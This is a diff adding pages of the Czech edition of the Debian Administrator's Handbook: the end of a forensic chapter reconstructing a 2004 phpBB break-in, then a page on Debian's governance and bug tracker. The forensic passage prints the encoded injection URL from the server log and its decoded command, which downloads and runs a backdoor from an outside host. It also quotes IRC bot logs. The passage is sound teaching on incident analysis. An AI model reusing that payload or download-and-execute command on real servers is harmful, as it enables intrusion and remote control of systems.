+              class="pkg pkg">autopsy</span> package).
+			</div><a
+            id="id-1.17.10.7.6"
+            class="indexterm"></a><a
+            id="id-1.17.10.7.7"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.reconstituting-the-attack-scenario"></a>14.7.6. Reconstituting the Attack Scenario</h3></div></div></div><div
+            class="para">
+				All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
+			</div><div
+            class="para">
+				The following log is an extract from an Apache <code
+              class="filename">access.log</code>:
+			</div><pre
+            class="programlisting">
+www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&amp;highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
+</pre><div
+            class="para">
+				This example matches exploitation of an old security vulnerability in phpBB. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://secunia.com/advisories/13239/">http://secunia.com/advisories/13239/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.phpbb.com/phpBB/viewtopic.php?t=240636">http://www.phpbb.com/phpBB/viewtopic.php?t=240636</a></div>
+			</div><div
+            class="para">
+				Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: <code
+              class="command">system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</code>. Indeed, a <code
+              class="filename">bd</code> file was found in <code
+              class="filename">/tmp/</code>. Running <code
+              class="command">strings /mnt/tmp/bd</code> returns, among other strings, <code
+              class="literal">PsychoPhobia Backdoor is starting...</code>. This really looks like a backdoor.
+			</div><div
+            class="para">
+				Some time later, this access was used to download, install and run an IRC <span
+              class="emphasis"><em>bot</em></span> that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
+			</div><pre
+            class="programlisting">** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
+** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
+** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
+** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
+** 2004-11-29-19:50:20: DCC CHAT Correct password
+(...)
+** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
+(...)
+** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
+(...)
+** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
+(...)
+** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
+</pre><div
+            class="para">
+				These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
+			</div><div
+            class="para">
+				In parallel, the attacker also downloaded a pair of extra files, <code
+              class="filename">/tmp/pt</code> and <code
+              class="filename">/tmp/loginx</code>. Running these files through <code
+              class="command">strings</code> leads to strings such as <span
+              class="foreignphrase"><em
+                class="foreignphrase">Shellcode placed at 0x%08lx</em></span> and <span
+              class="foreignphrase"><em
+                class="foreignphrase">Now wait for suid shell...</em></span>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
+			</div><div
+            class="para">
+				In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-security-considerations.html"><strong>Předcházející</strong>14.6. Other Security-Related Considerations</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="debian-packaging.html"><strong>Další</strong>Kapitola 15. Creating a Debian Package</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html
new file mode 100644
index 000000000..dc15c113b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.debian-internals.html
@@ -0,0 +1,873 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.3. Vnitřní fungování projektu Debian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.foundation-documents.html"
+        title="1.2. Dokumenty nadace" /><link
+        rel="next"
+        href="sect.follow-debian-news.html"
+        title="1.4. Follow Debian News" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.debian-internals.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.foundation-documents.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.follow-debian-news.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.debian-internals"></a>1.3. Vnitřní fungování projektu Debian</h2></div></div></div><a
+          id="id-1.4.6.2"
+          class="indexterm"></a><a
+          id="id-1.4.6.3"
+          class="indexterm"></a><div
+          class="para">
+			Bohaté konečné výsledky vyproduktované projektem Debian vycházejí současně z práce na infrastruktuře prováděné zkušenými vývojáři Debianu, z individuálních nebo kolektivních prací vývojářů na debianovských balíčcích a z reakcí uživatelů.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.5"></a>1.3.1. Vývojáři Debianu</h3></div></div></div><a
+            id="id-1.4.6.5.2"
+            class="indexterm"></a><div
+            class="para">
+				Debian developers have various responsibilities, and as official project members, they have great influence on the direction the project takes. A Debian developer is generally responsible for at least one package, but according to their available time and desire, they are free to become involved in numerous teams, acquiring, thus, more responsibilities within the project. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/devel/people">https://www.debian.org/devel/people</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/intro/organization">https://www.debian.org/intro/organization</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Teams">https://wiki.debian.org/Teams</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span>Databáze vývojářů</strong></p></div></div></div><a
+              id="id-1.4.6.5.4.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Debian has a database including all developers registered with the project, and their relevant information (address, telephone, geographical coordinates such as longitude and latitude, etc.). Some of the information (first and last name, country, username within the project, IRC username, GnuPG key, etc.) is public and available on the Web. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://db.debian.org/">https://db.debian.org/</a></div>
+			</div><div
+              class="para">
+				Zeměpisné souřadnice umožňují vytvoření mapy s umístěním všech vývojářů po celém světě. Debian je skutečně mezinárodní projekt: jeho vývojáře lze nalézt na všech kontinentech, i když většina je v “západních zemích”.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.4.6.5.4.6"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/developers-map.png"
+                    alt="Celosvětové rozmístění vývojářů Debianu" /></div><a
+                  id="id-1.4.6.5.4.6.3"
+                  class="indexterm"></a></div><p
+                class="title"><strong>Obrázek 1.1. Celosvětové rozmístění vývojářů Debianu</strong></p></div></div><div
+            class="para">
+				Package maintenance is a relatively regimented activity, very documented or even regulated. It must, in effect, comply with all the standards established by the <span
+              class="emphasis"><em>Debian Policy</em></span>. Fortunately, there are many tools that facilitate the maintainer's work. The developer can, thus, focus on the specifics of their package and on more complex tasks, such as squashing bugs. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/doc/debian-policy/">https://www.debian.org/doc/debian-policy/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span>Údržba balíčků, práce vývojáře</strong></p></div></div></div><a
+              id="id-1.4.6.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Údržba balíčku znamená nejprve “balení” programu. Konkrétně to znamená definovat prostředky instalace tak, aby po instalaci tento program fungoval a dodržoval pravidla, která projekt Debian pro sebe stanovil. Výsledek této operace je uložen v souboru <code
+                class="filename">.deb</code>. Účinná instalace programu pak nebude vyžadovat nic víc než extrakci tohoto komprimovaného archivu a spuštění některých předinstalačních nebo poinstalačních zde obsažených skriptů.
+			</div><div
+              class="para">
+				Po této počáteční fázi, cyklus údržby opravdu začíná: Příprava aktualizací podle nejnovějších Zásad Debianu, opravy chyb hlášených uživateli a zahrnutí nových “upstreamových” verzí programu, které se přirozeně i nadále současně vyvíjejí. Například v době počátečního balení byl program ve verzi 1.2.3. Po několika měsících vývoje, původní autoři vydávají novou stabilní verzi, očíslovanou 1.4.0. V tuto chvíli by měl správce Debianu balíček aktualizovat, aby uživatelé mohli využívat nejnovější stabilní verzi.
+			</div></div><a
+            id="id-1.4.6.5.7"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.8"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.9"
+            class="indexterm"></a><div
+            class="para">
+				The Policy, an essential element of the Debian Project, establishes the norms ensuring both the quality of the packages and perfect interoperability of the distribution. Thanks to this Policy, Debian remains consistent despite its gigantic size. This Policy is not fixed in stone, but continuously evolves thanks to proposals formulated on the <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code> mailing list. Amendments that are agreed upon by all interested parties are accepted and applied to the text by a small group of maintainers who have no editorial responsibility (they only include the modifications agreed upon by the Debian developers that are members of the above-mentioned list). You can read current amendment proposals on the bug tracking system: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://bugs.debian.org/debian-policy">https://bugs.debian.org/debian-policy</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Proces vydávání Zásad</strong></p></div></div></div><div
+              class="para">
+				Kdokoli může navrhnout změnu v Zásadách Debianu pouhým odesláním chybového hlášení s úrovní závažnosti “přání” proti <span
+                class="pkg pkg">debian-policy</span> balíčku. Proces, který se spustí, je dokumentován v <code
+                class="filename">/usr/share/doc/debian-policy/Process.html </code>: Pokud je uznáno, že zjištěný problém musí být vyřešen vytvořením nového pravidla v Zásadách Debianu, začíná diskuze na seznamu elektronické pošty <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code>, dokud není dosaženo shody a návrh je vydán. Někdo potom návrhne požadovanou změnu a předloží ke schválení (v podobě patche k přezkoumání). Jakmile dva další vývojáři schválí skutečnost, že navrhovaná změna odráží shodu dosaženou v předchozí diskusi (proces “secondování”), návrh může být zařazen do úředního dokumentu jedním ze správců balíčku <span
+                class="pkg pkg">debian-policy</span>. Pokud proces selže v jednom z těchto kroků, správci uzavřou chybu a klasifikují návrh jako zamítnutý.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZÁSADY DEBIANU</em></span> dokumentace</strong></p></div></div></div><a
+              id="id-1.4.6.5.12.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.5"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.6"
+              class="indexterm"></a><div
+              class="para">
+				Dokumentace pro každý balíček je uložena v <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">balíček</em>/</code>. Tento adresář často obsahuje soubor <code
+                class="filename">README.Debian</code>, popisující specifické úpravy Debianu, které provádí správce balíčku. Je tedy moudré přečíst si tento soubor před jakýmkoliv nastavováním, a těžit z těchto zkušeností. Nalezneme také soubor <code
+                class="filename">changelog.Debian.gz</code> popisující změny provedené správcem Debianu při přechodu z jedné verze na následující. To by se nemělo zaměňovat se souborem <code
+                class="filename">changelog.gz</code> (nebo jeho obdobami), který popisuje změny provedené upstreamovými vývojáři. Soubor <code
+                class="filename">copyright</code> obsahuje informace o autorech a o licenci vztahující se na software. A na závěr také můžeme najít soubor s názvem <code
+                class="filename">NEWS.Debian.gz</code>, který vývojářům Debianu umožňuje sdělovat důležité informace týkající se aktualizací; Pokud je nainstalován <span
+                class="emphasis"><em>apt-listchanges</em></span>, zobrazí se tyto zprávy automaticky. Všechny ostatní soubory jsou specifické pro daný software. Především bychom chtěli poukázat na podadresář <code
+                class="filename">examples</code>, který často obsahuje příklady konfiguračních souborů.
+			</div></div><div
+            class="para">
+				Zásady do značné míry pokrývají technické aspekty balíčků. Velikost projektu také vyvolává organizační problémy; ty jsou řešeny Stanovami Debianu, které vytváří strukturu a prostředky pro rozhodování. Jinými slovy, formální systém řízení.
+			</div><a
+            id="id-1.4.6.5.14"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.15"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.16"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.17"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.18"
+            class="indexterm"></a><div
+            class="para">
+				Stanovy definují určitý počet rolí a postů, plus jejich odpovědnosti a pravomoce. Zejména je třeba poznamenat, že vývojáři Debianu mají vždy konečný rozhodovací pravomoc hlasováním o obecném usnesení, kde je vyžadována kvalifikovaná většina tří čtvrtin (75%) hlasů pro učinění významných změn (např. s dopadem na dokumenty nadace). Nicméně, vývojáři každoročně volí “vedoucího”, aby je zastupoval na schůzkách, a zajistit vnitřní koordinaci mezi různými týmy. Tato volba je vždy obdobím intenzivních diskuzí. Role vedoucího není formálně definována žádným dokumentem: kandidáti na tento post obvykle navrhují vlastní definice pozice. V praxi role vedoucího zahrnuje zastupování vůči sdělovacím prostředkům, koordinaci mezi “interními” týmy a zajišťování celkového vedení projektu, na kterém se vývojáři mohou podílet: záměry DPL jsou implicitně schvalovány většinou členů projektu.
+			</div><div
+            class="para">
+				V podstatě má vedoucí opravdové pravomoce; jejich zvolení vzešla z těsných hlasování; mohou učinit jakékoli rozhodnutí, které již není pod pravomocí někoho jiného a mohou delegovat části svých povinností.
+			</div><a
+            id="id-1.4.6.5.21"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.22"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.23"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.24"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.25"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.26"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.27"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.28"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.29"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.30"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.31"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.32"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.33"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.34"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.35"
+            class="indexterm"></a><div
+            class="para">
+				Since its inception, the project has been successively led by Ian Murdock, Bruce Perens, Ian Jackson, Wichert Akkerman, Ben Collins, Bdale Garbee, Martin Michlmayr, Branden Robinson, Anthony Towns, Sam Hocevar, Steve McIntyre, Stefano Zacchiroli, Lucas Nussbaum, Mehdi Dogguy and Chris Lamb.
+			</div><a
+            id="id-1.4.6.5.37"
+            class="indexterm"></a><div
+            class="para">
+				Stanovy rovněž definují “technickou komisi”. Hlavní úlohou této komise je rozhodovat v technických otázkách, pokud se zúčastnění vývojáři mezi sebou nedohodnou. Jinak má tato komise roli rádce pro vývojáře, kterému se nepodařilo učinit rozhodnutí, za které má odpovědnost. Je důležité poznamenat, že se zapojí pouze v případě, kdy je k tomu jednou ze zainteresovaných stran vyzvána.
+			</div><a
+            id="id-1.4.6.5.39"
+            class="indexterm"></a><div
+            class="para">
+				A konečně stanovy definují pozici “tajemníka projektu”, který má na starosti organizaci hlasování v souvislosti s různými volbami a obecnými usneseními.
+			</div><div
+            class="para">
+				The “general resolution” procedure is fully detailed in the constitution, from the initial discussion period to the final counting of votes. The most interesting aspect of that process is that when it comes to an actual vote, developers have to rank the different ballot options between them and the winner is selected with a <a
+              href="https://en.wikipedia.org/wiki/Condorcet_method">Condorcet method</a> (more specifically, the Schulze method). For further details see: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/devel/constitution.en.html">http://www.debian.org/devel/constitution.en.html</a></div>
+			</div><a
+            id="id-1.4.6.5.42"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.43"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Flamewar, diskuse, která zachytí požár</strong></p></div></div></div><a
+              id="id-1.4.6.5.44.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.44.3"
+              class="indexterm"></a><div
+              class="para">
+				“Flamewar” je mimořádně vášnivá debata, která často končí s lidmi napadajícími se navzájemm, jakmile všechny rozumné argumentace byly vyčerpána na obou stranách. Některá témata jsou častěji předmětem polemik než ostatní (volba textového editoru, “dáváte přednost <code
+                class="command">vi</code> nebo <code
+                class="command">emacsu</code>?”, je staré oblíbené). Tyto věci často vyvolávají velmi rychlé výměny emailů v důsledku velkého počtu lidí se stanoviskem k této záležitosti (všichni) a velmi osobní povahu takových námitek.
+			</div><div
+              class="para">
+				Obecně, nic zvlášť užitečného z takových diskusí nevzejde; Všeobecné doporučení je zůstat mimo takové debaty a asi rychle prolistovat jejich obsah, protože jejich čtení v plném rozsahu by bylo příliš časově náročné.
+			</div></div><div
+            class="para">
+				I když stanovy vytváří zdání demokracie, denní realita je zcela odlišná: Debian přirozeně dodržuje pravidla svobodného softwaru do-ocracie: ten, kdo dělá věci rozhoduje, jak je dělat. Mnoho času může být vyplýtváno debatováním o jednotlivých přínosech různých cest, jak přistupovat k problému; zvolené řešení bude to první, která je obojí - funkční a uspokojující..., které vyjde z času, který do něj způsobilá osoba vložila.
+			</div><div
+            class="para">
+				To je jediný způsob, jak si vysloužit ostruhy: udělat něco užitečného a ukázat, že se pracovalo dobře. Mnoho “administrativních” týmů Debianu působí za pomocí kooptace, upřednostňující dobrovolníky, kteří již efektivně přispěli a prokázali svou schopnost. Veřejná podstata práce těchto týmů umožňuje novým přispěvatelům pozorovat a začít pomáhat bez zvláštních privilegií. Proto je Debian často popisován jako “meritokracie”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Meritokracie, vláda znalostí</strong></p></div></div></div><a
+              id="id-1.4.6.5.47.2"
+              class="indexterm"></a><div
+              class="para">
+				Meritokracie je forma vlády, v níž je autorita vykonávána těmi, kteří mají největší zásluhy. Pro Debian, jsou zásluhy měřítkem kompetence, která je sama o sobě, posuzována sledováním dřívějších činností jednoho nebo více lidí v rámci projektu (Stefano Zacchiroli, bývalý vedoucí projektu, hovoří o “do-okracii”, což znamená “moc pro ty, kteří věci dělají”). Jejich prostá existence dokazuje určitou úroveň kompetence; jejich úspěchy obecně je svobodný software, s dostupným zdrojovým kódem, který může být snadno přezkoumán ostatními k posouzení jejich kvality.
+			</div></div><div
+            class="para">
+				Tato účinná operativní metoda zaručuje kvalitu přispěvatelů v “klíčových” týmech Debianu. Tato metoda není v žádném případě dokonalá a občas se vyskytnou tací, kteří nepřijmou tento způsob fungování. Výběr vývojářů přijatých do týmů se může zdát trochu svévolný, nebo dokonce nespravedlivý. Navíc, ne každý má stejnou představu o službách očekávaných od těchto týmů. Pro někoho je nepřijatelné muset čekat osm dní pro zahrnutí nového debianovského balíčku, zatímco ostatní budou trpělivě čekat tři týdny bez problémů. Jako takové, se pravidelně vyskytují stížnosti od těch nespokojených na “kvalitu služeb” některých týmů.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Začleňování nových správců</strong></p></div></div></div><a
+              id="id-1.4.6.5.49.2"
+              class="indexterm"></a><div
+              class="para">
+				Tým, který má na starosti přijímání nových vývojářů, je pravidelně nejvíce kritizován. Je třeba uznat, že v průběhu let se debianovský projekt stává stále náročnějším pro vývojáře, které bude přijímat. Někteří lidé v tom mohou vidět nespravedlnost, musíme ale přiznat, že to, co se jevilo jako malá výzva na začátku se stalo výzvou mnohem větší ve společenství čítajícím více než 1 000 lidí, pokud jde o zajištění kvality a integrity všeho, co Debian produkuje pro své uživatele.
+			</div><a
+              id="id-1.4.6.5.49.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.49.5"
+              class="indexterm"></a><div
+              class="para">
+				Dále, postup přijetí je ukončen přezkoumáním kandidatury malým týmem - account manažery Debianu. Tito manažeři jsou také obzvláště vystaveni kritice, protože mají konečné slovo v přijetí nebo odmítnutí dobrovolníka v rámci komunity vývojářů Debianu. V praxi, musí někdy zpozdit přijetí osoby, aby se dozvěděli více o činnosti projektu. Člověk může samozřejmě přispívat k Debianu i před přijetím za oficiálního vývojářáře tím, že je zaštiťován vývojáři současnými.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.6"></a>1.3.2. Aktivní role uživatelů</h3></div></div></div><div
+            class="para">
+				Jeden by mohl nadnést, zda je vůbec důležité zmiňovat uživatele zároveň s těmi, kteří pracují v rámci projektu Debian, ale odpověď je definitivní ano: hrají důležitou roli v projektu. Někteří uživatelé jsou daleko od toho být nazýváni “pasivními”, někteří spouštějí vývojové verze Debianu a pravidelně zakládají hlášení o chybách a upozorňují na problémy. Jiní jdou ještě dál a předkládají nápady pro zlepšení tím, že podávají hlášení o chybě s úrovní závažnosti “přání”, nebo dokonce předkládají opravy zdrojového kódu nazvané “patche” (viz postranní informace <a
+              class="xref"
+              href="sect.debian-internals.html#sidebar.patch"><span
+                class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Patch, způsob zasílání oprav</a>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bts"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span> Systém na sledování chyb</strong></p></div></div></div><a
+              id="id-1.4.6.6.3.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.5"
+              class="indexterm"></a><div
+              class="para">
+				Sledovcí systém chyb Debianu (Debian BTS) je používán velkými částmi projektu. Veřejná část (webové rozhraní) umožňuje uživatelům zobrazit všechny ohlášené chyby, s možností zobrazit seřazený seznam chyb vybraných podle různých kritérií, jako například: dotčený balíček, závažnost, stav, adresa ohlašovatele, adresa zodpovědného správce, tag, apod. Je také možné procházet celý historický výpis všech diskusí týkajících se jednotlivých chyb.
+			</div><div
+              class="para">
+				Pod povrchem je Debian BTS založen na e-mailu: všechny informace, které uchovává, pocházejí ze zpráv odeslaných různými osobami. Všechny e-maily odeslané na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:12345@bugs.debian.org">12345@bugs.debian.org</a></code> budou tedy přiřazeny k historii chyby číslo 12345. Oprávněné osoby mohou chybu “uzavřítٌ” napsáním zprávy popisující důvody rozhodnutí o uzavření na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:12345-Done@bugs.debian.org">12345-Done@bugs.debian.org</a></code> (chyba je uzavřena, pokud je uvedený problém vyřešen nebo již není relevantní). Nová chyba je hlášena zasláním e-mailu na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:Submit@bugs.debian.org">Submit@bugs.debian.org</a></code> podle konkrétního formátu, který identifikuje dotyčný balíček. Adresa <code
+                class="email"><a
+                  class="email"
+                  href="mailto:Control@bugs.debian.org">Control@bugs.debian.org</a></code> umožňuje editaci všech “meta-informací” vztahujících se k chybě.
+			</div><div
+              class="para">
+				The Debian BTS has other functional features, as well, such as the use of tags for labeling bugs. For more information, see <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/Bugs/">https://www.debian.org/Bugs/</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SLOVNÍČEK</em></span> Závažnost chyby</strong></p></div></div></div><a
+              id="id-1.4.6.6.4.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Závažnost chyby formálně přiřazuje reportovanému problému stupeň důležitosti. V praxi, ne všechny chyby mají stejnou důležitost; například překlep na stránce manuálu se nemůže rovnat bezpečnostnímu riziku v softwaru serveru.
+			</div><div
+              class="para">
+				Debian uses an extended scale to describe the severity of a bug. Each level is defined precisely in order to facilitate the selection thereof. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/Bugs/Developer#severities">https://www.debian.org/Bugs/Developer#severities</a></div>
+			</div></div><div
+            class="para">
+				Additionally, numerous satisfied users of the service offered by Debian like to make a contribution of their own to the project. As not everyone has appropriate levels of expertise in programming, they may choose to assist with the translation and review of documentation. There are language-specific mailing lists to coordinate this work. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
